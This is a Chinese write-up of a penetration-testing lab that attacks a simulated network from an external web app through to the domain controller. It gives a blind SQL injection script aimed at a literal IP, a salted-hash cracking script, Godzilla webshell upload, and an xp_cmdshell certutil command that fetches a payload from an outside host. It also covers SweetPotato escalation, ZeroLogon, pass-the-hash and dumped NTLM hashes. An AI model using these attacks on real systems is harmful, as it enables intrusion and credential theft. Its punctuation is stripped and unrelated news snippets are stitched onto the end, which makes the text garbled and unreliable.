域渗透之外网打点到三层内网
环境搭建1。项目介绍:
本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobaltstrike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点进入内网,详细介绍外网各种打点方法,学习到行业流行的内网渗透测试办法,对个人提升很有帮助。2。VPS映射
1。将ip映射到公网。在公网vps使用配置frp工具的frps。ini运行frps。execfrps。ini
在web1上配置frpc。ini运行frpc。execfrp。ini
成功访问到环境
http:x。x。x。x:8088login。jsp
信息收集1。端口探测
使用nmap进行端口探测,发现4444、5003、8088、8899、8878端口开放。
然后查看其详细信息。
2。网站源代码查找
发现有一个网上银行系统。使用弱口令和暴力破解,没有爆破出弱口令用户。
然后就在github试试运气,发现了源码。
源码地址:https:github。comamateurRDnetBankSystem
发现了一个数据库文件,有一些普通用户和管理员用户的账户和密码。
3。SQL注入
然后进行登录测试,发现存在sql注入漏洞
网上银行系统Hsql注入漏洞
使用sqlmap不能进行跑出用户名和密码。
4。编写脚本进行sql注入coding:utf8importrequestspasswordurl〔http:x。x。x。x:8878adminlogin〕(http:103。121。93。206:8878adminlogin)payload0123456789abcdefghijklmnopqrstuvwxyzpasswordforiinrange(1,20):forjinpayload:expadminand(selectsubstring(password,s,1)fromAdmin)likesor1(i,j)print(正在注入)data{admin。username:exp,admin。password:aaaa,type:1}reqrequests。post(urlurl,datadata);if密码不正确inreq。text:passwordjbreakprint(password)
成功跑出密码。然后进行登录。
登录之后,寻找文件上传或者可以获取到webshell的地方,发现没有可利用点。
5。tomexamSQL注入漏洞
在另一个地址处,发现可以注册用户。然后注册用户进行登录。
登录之后发现,某处存在sql注入。
使用sqlmap进行获取用户信息。
1113999999991超级管理员adminadmin17D03DA6474CE8BEB13B01E79F789E632022040900:14:08301
621eu3eu34124DDEBABDF97C2430274823B3184D4(eu3)2014051713:58:4914
成功抓到了管理员用户和密码,然后使用md5进行解密。
成功进行登录。登录之后没有找到可getshell的地方。
6。JspxcmsSQL注入
首页发现可以注册用户和进行登录。首先搜索历史漏洞,看看有没有getshell的地方。
发现先知的大佬做过找个版本的代码审计。参考链接:https:xz。aliyun。comt10891?page1toc7。发现可以通过文件上传进行gethshell。
在之前的tomexam的数据库中,发现存在jspxcms,试试查找一下管理员的用户和信息。
使用sqlmap进行查找表、用户和吗密码。
成功发现了用户名和加密的密码。密码推断是明文密码salt然后再进行md5加密。
7。编写解密脚本
通过其源码,分析其加密方式,然后编写解密脚本。packagecom。jspxcms。core;importcom。jspxcms。common。security。SHA1CredentialsDigest;importcom。jspxcms。common。util。Encodes;importjava。io。File;importjava。io。FileReader;importjava。io。FileWriter;importjava。io。PrintWriter;importjava。util。Scanner;publicclassTestmain{publicstaticvoidmain(String〔〕args)throwsException{byte〔〕saltEncodes。decodeHex(9b2b38ad7cb62fd9);SHA1CredentialsDigesttestnewSHA1CredentialsDigest();StringfileNameD:csdnpass。txt;StringfileName2D:hashpassword2。txt;try(ScannerscnewScanner(newFileReader(fileName))){while(sc。hasNextLine()){Stringlinesc。nextLine();StringencPasstest。digest(line,salt);FilefnewFile(fileName2);FileWriterfwnewFileWriter(f,true);PrintWriterpwnewPrintWriter(fw);pw。println(lineencPass);pw。close();}}}}
8。登录jspxcms后台getshell
使用管理员用户和解密出来的密码,成功进入管理员后台。
使用哥斯拉生成一个木马,然后使用jar,打包成为war包。
9。编写目录穿越脚本
根据先知社区的大佬提出的方法,编写目录穿越脚本。
成功进行上传。
10。获取webshell
使用哥斯拉连接webshell,成功执行命令。
内网渗透:1。frp反向代理上线CS
首先配置内网cobaltstrike内网上线
在kali启动cs服务端,
查看其端口
配置frp的frps。ini信息。
2。CS上线
cs生成监听。
然后上传。exe文件进行上线。
成功上线。
3。内网信息收集
使用shelliponfig收集信息。
根据搭建的拓扑环境,然后测试一下与其他域内主机的连通性。
查看计算机名。
使用netview查找域内其它主机,发现不能找到其他主机。
4。开启代理进行端口扫描
查看server2012的IP地址。
5。域内主机端口扫描
发现存在1433Mysql的端口,尝试进行弱口令的暴力破解。
最好成功爆破出账号和密码。
6。mssqlclient登录Mssql服务器
使用mysql用户和密码进行登录。
7。xpcmshell进行getshell
help查看可以执行那些命令。
开启xpcmdshell,然后进行信息收集。
使用certutil远程下载之前的木马,然后进行上线
xpcmdshellcertutilurlcachesplitfhttp:39。103。134。134artifact。exe
c:windowstempartifact。exe
8。使用SweetPotato(ms16075)提权
上线之后,进行简单的信息收集。
然后使用第三方插件,利用SweetPotato(ms16075)提权对其进行提权。
成功提权。
内网域渗透1。内网域信息收集
使用netview查看域内主机。
使用hashdump进行抓取一些用户的hash值。
查看主机ip地址。
查看域控的Ip地址,和域控的计算机名。
2。ZeroLogonCVE20201472获取域控权限
编译zerolgin的脚本成为exe,然后进行测试,发现主机存在该漏洞。
将它设置为空密码。31d6cfe0d16ae931b73c59d7e0c089c0
3。配置代理,登录域控
配置kali的代理地址,然后进行端口扫描,测试代理是否连接。
获取域控的hash值。
Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b20eb34f01eaa5ac8b6f80986c765d6d:::
sec123。cnkcnk:1108:aad3b435b51404eeaad3b435b51404ee:83717c6c405937406f8e0a02a7215b16:::
AD01:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SERVER2012:1109:aad3b435b51404eeaad3b435b51404ee:cc759f89477f1595c993831ce5944e95:::
然后进行登录域控。
4。PTH上线CS
关闭防火墙,利用pth进行上线cs。
成功执行命令。
生成tcp监听,然后jump到域控主机。
5。恢复密码、原hash。
恢复密码。
使用secretsdump。py获取其hash值。
python3secretsdump。pysamsam。savesystemsystem。savesecurity
security。saveLOCA
使用:proxychains4python3reinstalloriginalpw。pyad0110。10。10。139
fb61e3c372e666adccb7a820aa39772f恢复域控密码。成功恢复其密码。
靶机到这里就结束了。
最后,成功拿下整个域控。
总结:
该项目从环境搭建,使用vps将web1主机映射到公网上。通过信息收集,搜索源码,然后分析源码,进行sql注入。编写sql注入脚本进行注入,通过分析登录端的源码编写加密脚本,在编写目录穿越脚本成功获取webshell。在内网渗透中,使用frp反向代理上线cs,使用xpcmdshell进行getshell。在域渗透中使用CVE20201472获取域控权限。这台靶机中没装杀软,但是从外网打点到内网渗透,再到域渗透中的知识面是非常广的。
申明:本文仅供技术交流,请自觉遵守网络安全相关法律法规,切勿利用文章内的相关技术从事非法活动,如因此产生的一切不良后果与文章作者无关本文原创作者:vghost
百家观点丨还好没建成,迪士尼的实验社区以下文章来源于ArchiWorld世界之旅,作者还是叫世旅君吧ArchiWorld世界之旅。中国建筑学会科普教育基地1966年,沃尔特迪士尼(WaltDisney)因肺癌躺在医院病
Zoom直播锐评Meiko事件,直言雯神人格有缺陷,但某些弹幕更过分头条创作挑战赛最近几天Meiko国服被喷事件闹得沸沸扬扬,想必大家或多或少也都看到了类似的消息。首先为大家回顾一下这个事情,起因就是Meiko的拉克丝一波向前闪现失误,遭到敌方击杀
对压力的一点点新的认知我才明白,人面对压力时,为什么会感觉到压力这么大?是一种失控的感觉。我以前压力最大的时候是为什么,是我感觉我好像没办法读书了一样,就是感觉有点强迫症的那种感觉,总觉得自己不是跟正常
第五人格车轮滚滚破轮全面详析本文首发第五许愿码公众号,未经授权禁止转发至其他平台。第五人格是由网易开发的非对称性对抗竞技类游戏游戏玩法多变内容丰富吸引了很多新手玩家加入今天由山海来为大家解析第五人格监管者阵营
观点是时候入局AR观影了吗?近期,2022世界VR产业大会在南昌召开,华为终端BG首席运营官何刚介绍了华为首款智能观影眼镜VisionGlass。这款眼镜采用MicroOLED显示屏,搭载120英寸虚拟巨幕。
突击一月没考上吃亏的永远是他们?小孙反映,他在一家培训机构交了钱,参加公务员考试的培训。根据合同,考试没通过的话可以退款,但对方现在要分期退,他不放心。一个月突击国考,没考上退款要分期小孙报名的培训机构,是中公教
A股成交持续缩量,2023年增量资金哪里来?10万亿超额存款或有答案2022年最后一个月,A股日度成交额持续缩量,月内即从单日万亿缩至最低不到6000亿,几近腰斩。第一财经记者发现,机构对于新的一年股市有望转入增量资金博弈阶段较有共识。然而紧跟的问
入冬进补,这些禁忌要知道进入冬季,天气变得寒冷干燥,人体的代谢也变慢,精气封藏,此时适当进补,有利于提升免疫力,维护身体健康。但是,不同年龄体质的人,在进补时有宜有忌,应当灵活掌握。今天,我就跟大家说一说
淼港澳跨境办服务范围再扩大!三水湾区通办上新8项社保事项1月5日,记者从佛山市三水区行政服务中心获悉,三水区已上线第三批共8项社保湾区通办事项,进一步扩大业务范围,拓宽湾区通办服务版图。以往,港澳市民逾期未办理养老保险待遇资格认证,需要
2022自然礼赞艺术家合作限量礼盒上市,奢享5J火腿纯正风味5J火腿携手西班牙杰出艺术家纳乔阿莱格里(NachoAlegre)先生和艾娜多明格斯(AnaDominguez)女士,推出2022年全新自然礼赞艺术家合作限量礼盒。阿莱格里(Ale
最正宗的广式腊肠做法,15年的老配方,香甜醇厚,比买的好吃多了腊月又叫十二月,是阴历中的最后一个月,腊味中的腊,跟腊味有很大的关系,多指腊肠腊肉腊鸭腊鱼等,古代没有冰箱,人们利用盐腌的方式,把新鲜的肉腌起来,以延长其保质期,达到不腐的目的。腊
数库科技沈鑫数据智能时代需要从大数据回到场景化的小数据澎湃财讯数据智能时代已经进入全新阶段,从大数据再回到小数据,这不是一种倒退,而是场景化的小数据。9月3日,数库科技创始人兼总裁沈鑫在2022世界人工智能大会数无疆智无界数据智能论坛
NASA登月任务ArtemisI将开启新的太空探索时代在人类首次登上月球的53年后,美国宇航局(NASA)正在启动其雄心勃勃的Artemis计划,以使人类重返月球,并将在下周一发射一枚巨大的新火箭。计划于美国东部时间8月29日上午进行
四千价位手机推荐,学生党四年轻松应对第一款vivoX80超高的性能和超强的拍摄能力以及天圆地方的外观,俘获了多少年轻人的心。首先看性能,其搭载的是最新的天玑9000处理器,还有4285mm平方大面积VC液冷散热,高频
专家建议秋后吃3草,身体倍棒吃嘛嘛香,3草指啥?前段时间回家休假,发现外婆在吃一种没见过的绿色菜,出于好奇问了外婆但她却没有直接回答我,反而奇奇怪怪的说了一句秋后吃3草身体倍棒吃嘛嘛香,我听了以后就觉得不靠谱让她别吃了,可外婆却
我一定会重游北京去了北京回来后,我就觉得旅游太美好了,我一定会重游北京的,感觉就是明年。因为明年姑娘就高考,我总觉得她会考上北京,那我去北京就理所当然,顺理成章。就因为这样的感觉太美好,我还专门去
关于友情,关于富有one原创Anna大大关注微信公众号Anna女巫大大订阅更多玫瑰玫瑰这是一个老话题了。但是特别值得说一两句。如果有一直关注我朋友圈的朋友们,应该感觉到我最近的生活看上去好像离工作很远,然
谈谈UFC和MMA的关系1984年在巴西举行的综合格斗比赛,一方是泰拳选手,一方是巴西柔术选手MMA是MixedMartialArts的英文缩写,有的翻译为混合格斗武术无限制格斗,通常翻译为综合格斗,综合
研究人员发现力量训练与长寿之间的关系研究人员发现,虽然进行有氧运动或力量训练与较低的死亡风险相关,经常同时进行这两种运动与死亡率风险更低有关。有规律的体育活动有许多已知的健康益处,其中之一就是它可以帮助你活得更久。但
最近想去西藏旅游,但对西藏不熟悉,有哪些需要注意和准备的?作为同样去过2次西藏的人来说,西藏的玩法大致总结为4种,我给你介绍一下第一种从出发地报团过去,我不是很推荐,这种团很多都是低价引客,到了那边各地自费和购物店,行程也会很赶,不推荐。
华大基因(300676。SZ)净利跌44。21,加快向常规业务转化8月24日晚间,华大基因(300676。SZ)公布了今年上半年的业绩报告期内,公司实现营业收入316133。37万元,同比下降13。30实现归属于上市公司股东的净利润60589。9
注意!多玛乐园910月开园时间调整啦!!为了给大家更好的游玩体验多玛乐园对9月10月份的开园时间进行了调整注意开园时间调整9月10月的周末中秋国庆为开园日其余时间不营业请大家提前安排好行程避免空跑9月开园日历10月开园日